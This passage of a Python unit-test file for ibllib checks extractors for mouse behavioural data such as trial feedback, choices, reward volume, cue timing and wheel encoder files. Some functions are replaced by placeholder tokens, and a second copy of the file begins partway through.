0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = 
biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n 
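# The lt5 training fixture carries no usable audio TTLs, so every\n        # go-cue onset is expected to come back NaN here; the other three\n        # sessions below yield real timestamps. Assumption read off the\n        # asserts that follow, not off the rig documentation.\n        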
self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = 
next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert 
np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n 
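# Inject a spurious 10 us pulse 80 ms after the first audio rise, plus\n        # an unmatched event at t=80 s; groom_pin_state(min_diff=0.005) should\n        # drop both and keep only the 4 genuine edges (asserted below).\n        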
audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 
0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = 
np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = 
biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = 